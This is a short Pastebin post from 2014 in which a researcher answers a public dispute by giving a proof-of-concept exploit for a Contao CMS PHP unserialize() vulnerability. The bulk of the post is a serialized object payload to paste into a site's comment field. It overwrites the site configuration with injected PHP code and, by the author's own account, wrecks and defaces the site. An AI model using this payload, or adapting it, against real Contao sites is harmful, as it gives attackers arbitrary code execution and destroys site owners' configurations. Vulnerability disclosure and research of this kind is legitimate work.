Guest User

Untitled

a guest
Feb 7th, 2014
4,326
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. In http://seclists.org/fulldisclosure/2014/Feb/47 Egidio Romano is unhappy that I doubted his PHP exploitation skillz on Twitter and continues to claim that the Contao unserialize() vulnerability is not exploitable. He challenges me to provide a POC for it.
  2.  
  3. Well I know best how painful it can be to go on stage and claim something is not exploitable and be proven wrong by someone smarter than me. However he asked for it.
  4.  
  5. Enter the following string e.g. in the comment field of a Contao site as you see http://demo.contao.org/en/news/james-wilson-returns.html and achieve arbitrary PHP code execution. PLEASE DO NOT TRY ON THE DEMO SITE, BECAUSE A) I DO NOT KNOW IF IT ALREADY RUNS THE FIXED VERSION AND B) IN CASE YOU SUCCEED THE EXPLOIT DESTROYS THE CONFIGURATION OF THE SITE AND FULLY DEFACES IT.
  6.  
  7. O:13:"Contao\Config":3:{S:8:"\\000*\\000Files";O:16:"Contao\Files\Php":0:{}S:9:"\\000*\\000strTop";s:24:"<?php phpinfo();die();?>";S:16:"\\000*\\000blnIsModified";b:1;}
  8.  
  9. So long...
  10. @i0n1c
RAW Paste Data